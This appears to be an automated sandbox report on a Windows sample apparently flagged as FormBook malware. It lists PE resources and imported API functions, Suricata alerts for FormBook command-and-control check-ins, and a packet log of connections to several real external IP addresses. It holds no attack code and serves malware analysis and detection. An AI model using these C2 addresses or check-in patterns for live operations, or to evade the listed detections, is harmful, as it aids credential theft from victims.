                                                    RT_ICON0xc75a80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                    RT_ICON0xc76d00x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                    RT_ICON0xc77f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                    RT_ICON0xc79200x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                                    RT_ICON0xc7c080x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                                    RT_ICON0xc7d300xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                                    RT_ICON0xc8bd80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                                    RT_ICON0xc94800x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                                    RT_ICON0xc99e80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                                    RT_ICON0xcbf900x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                                    RT_ICON0xcd0380x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                                    RT_MENU0xcd4a00x50dataEnglishGreat Britain0.9
                                                    RT_STRING0xcd4f00x594dataEnglishGreat Britain0.3333333333333333
                                                    RT_STRING0xcda840x68adataEnglishGreat Britain0.2747909199522103
                                                    RT_STRING0xce1100x490dataEnglishGreat Britain0.3715753424657534
                                                    RT_STRING0xce5a00x5fcdataEnglishGreat Britain0.3087467362924282
                                                    RT_STRING0xceb9c0x65cdataEnglishGreat Britain0.34336609336609336
                                                    RT_STRING0xcf1f80x466dataEnglishGreat Britain0.3605683836589698
                                                    RT_STRING0xcf6600x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishGreat Britain0.502906976744186
                                                    RT_RCDATA0xcf7b80x53ecfdata1.0003229006367833
                                                    RT_GROUP_ICON0x1236880x76dataEnglishGreat Britain0.6610169491525424
                                                    RT_GROUP_ICON0x1237000x14dataEnglishGreat Britain1.25
                                                    RT_GROUP_ICON0x1237140x14dataEnglishGreat Britain1.15
                                                    RT_GROUP_ICON0x1237280x14dataEnglishGreat Britain1.25
                                                    RT_VERSION0x12373c0xdcdataEnglishGreat Britain0.6181818181818182
                                                    RT_MANIFEST0x1238180x3efASCII text, with CRLF line terminatorsEnglishGreat Britain0.5074478649453823

                                                    Imports

                                                    DLLImport
                                                    WSOCK32.dllWSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
                                                    VERSION.dllGetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
                                                    WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
                                                    COMCTL32.dllImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
                                                    MPR.dllWNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
                                                    WININET.dllInternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
                                                    PSAPI.DLLGetProcessMemoryInfo
                                                    IPHLPAPI.DLLIcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
                                                    USERENV.dllDestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
                                                    UxTheme.dllIsThemeActive
                                                    KERNEL32.dllDuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
                                                    USER32.dllAdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
                                                    GDI32.dllStrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
                                                    COMDLG32.dllGetOpenFileNameW, GetSaveFileNameW
                                                    ADVAPI32.dllGetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
                                                    SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                    ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
                                                    OLEAUT32.dllLoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit

                                                    Possible Origin

                                                    Language of compilation systemCountry where language is spokenMap
                                                    EnglishGreat Britain

                                                    Network Behavior

                                                    Suricata IDS Alerts

                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                    2024-12-13T13:07:23.267453+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74982238.47.233.2180TCP
                                                    2024-12-13T13:07:23.267453+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74982238.47.233.2180TCP
                                                    2024-12-13T13:07:40.295192+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749858172.67.137.4780TCP
                                                    2024-12-13T13:07:42.951429+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749868172.67.137.4780TCP
                                                    2024-12-13T13:07:45.607692+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749874172.67.137.4780TCP
                                                    2024-12-13T13:07:48.401968+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749880172.67.137.4780TCP
                                                    2024-12-13T13:07:48.401968+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749880172.67.137.4780TCP
                                                    2024-12-13T13:07:57.623567+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749902206.238.89.11980TCP
                                                    2024-12-13T13:08:00.279671+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749911206.238.89.11980TCP
                                                    2024-12-13T13:08:02.936016+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749918206.238.89.11980TCP
                                                    2024-12-13T13:08:05.631634+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749924206.238.89.11980TCP
                                                    2024-12-13T13:08:05.631634+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749924206.238.89.11980TCP
                                                    2024-12-13T13:08:12.721564+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74994166.29.149.4680TCP
                                                    2024-12-13T13:08:15.375502+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74994866.29.149.4680TCP
                                                    2024-12-13T13:08:18.034708+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74995566.29.149.4680TCP
                                                    2024-12-13T13:08:20.715432+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74996166.29.149.4680TCP
                                                    2024-12-13T13:08:20.715432+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74996166.29.149.4680TCP
                                                    2024-12-13T13:08:27.793769+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749978217.70.184.5080TCP
                                                    2024-12-13T13:08:30.458875+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749985217.70.184.5080TCP
                                                    2024-12-13T13:08:33.827966+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749989217.70.184.5080TCP
                                                    2024-12-13T13:08:36.422986+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749990217.70.184.5080TCP
                                                    2024-12-13T13:08:36.422986+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749990217.70.184.5080TCP

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Dec 13, 2024 13:07:21.605407000 CET4982280192.168.2.738.47.233.21
                                                    Dec 13, 2024 13:07:21.725297928 CET804982238.47.233.21192.168.2.7
                                                    Dec 13, 2024 13:07:21.725411892 CET4982280192.168.2.738.47.233.21
                                                    Dec 13, 2024 13:07:21.733755112 CET4982280192.168.2.738.47.233.21
                                                    Dec 13, 2024 13:07:21.854259968 CET804982238.47.233.21192.168.2.7
                                                    Dec 13, 2024 13:07:23.265644073 CET804982238.47.233.21192.168.2.7
                                                    Dec 13, 2024 13:07:23.265805960 CET804982238.47.233.21192.168.2.7
                                                    Dec 13, 2024 13:07:23.267452955 CET4982280192.168.2.738.47.233.21
                                                    Dec 13, 2024 13:07:23.268572092 CET4982280192.168.2.738.47.233.21
                                                    Dec 13, 2024 13:07:23.388791084 CET804982238.47.233.21192.168.2.7
                                                    Dec 13, 2024 13:07:38.655781031 CET4985880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:38.775712013 CET8049858172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:38.775800943 CET4985880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:38.787792921 CET4985880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:38.907581091 CET8049858172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:40.295192003 CET4985880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:40.555041075 CET8049858172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:40.555258036 CET4985880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:41.313827038 CET4986880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:41.433533907 CET8049868172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:41.434132099 CET4986880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:41.447828054 CET4986880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:41.567944050 CET8049868172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:42.951428890 CET4986880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:43.072848082 CET8049868172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:43.072981119 CET4986880192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:43.969871044 CET4987480192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:44.089706898 CET8049874172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:44.090003967 CET4987480192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:44.101985931 CET4987480192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:44.221996069 CET8049874172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:44.222321033 CET8049874172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:45.607692003 CET4987480192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:45.726150036 CET8049874172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:45.726161003 CET8049874172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:45.726253986 CET4987480192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:45.726253986 CET4987480192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:45.727758884 CET8049874172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:45.727830887 CET4987480192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:46.625912905 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:46.745795012 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:46.745881081 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:46.753331900 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:46.873075962 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.401653051 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.401822090 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.401968002 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.942686081 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942747116 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942761898 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942878008 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.942898989 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942923069 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942939043 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942954063 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942955971 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.942970037 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.942980051 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.943038940 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.943135023 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.951159954 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.951200008 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.951360941 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:48.959518909 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:48.959880114 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.062988997 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.063102961 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.063302994 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.134663105 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.134742975 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.134955883 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.136964083 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.137108088 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.137360096 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.145025015 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.145041943 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.145175934 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.153047085 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.153076887 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.153202057 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.160988092 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.161082029 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.161170006 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.168952942 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.169079065 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.169207096 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.176924944 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.177105904 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.177443027 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.184961081 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.185031891 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.185163975 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.192934990 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.193064928 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.193207026 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.200938940 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.201226950 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.201359987 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.208615065 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.208750963 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.208843946 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.216316938 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.216348886 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.216433048 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.223793983 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.223895073 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.223985910 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.255053043 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.310748100 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.326936007 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.327008963 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.327126980 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.329303980 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.329389095 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.329525948 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.334719896 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.334732056 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.334800959 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.339396954 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.339575052 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:49.339651108 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.341926098 CET4988080192.168.2.7172.67.137.47
                                                    Dec 13, 2024 13:07:49.461565971 CET8049880172.67.137.47192.168.2.7
                                                    Dec 13, 2024 13:07:55.980467081 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:56.100342989 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:56.100436926 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:56.117201090 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:56.237215042 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:57.623567104 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:57.651676893 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:57.651765108 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:57.651868105 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:57.652206898 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:57.743357897 CET8049902206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:57.743428946 CET4990280192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:58.641510963 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:58.761349916 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:07:58.761452913 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:58.773279905 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:07:58.893419981 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:00.279670954 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:00.326000929 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:00.326114893 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:00.326145887 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:00.326180935 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:00.399882078 CET8049911206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:00.400330067 CET4991180192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:01.300612926 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:01.420489073 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:01.420624971 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:01.432712078 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:01.552607059 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:01.552650928 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:02.936016083 CET4991880192.168.2.7206.238.89.119
                                                    Dec 13, 2024 13:08:02.988624096 CET8049918206.238.89.119192.168.2.7
                                                    Dec 13, 2024 13:08:02.988776922 CET4991880192.168.2.7206.238.89.119
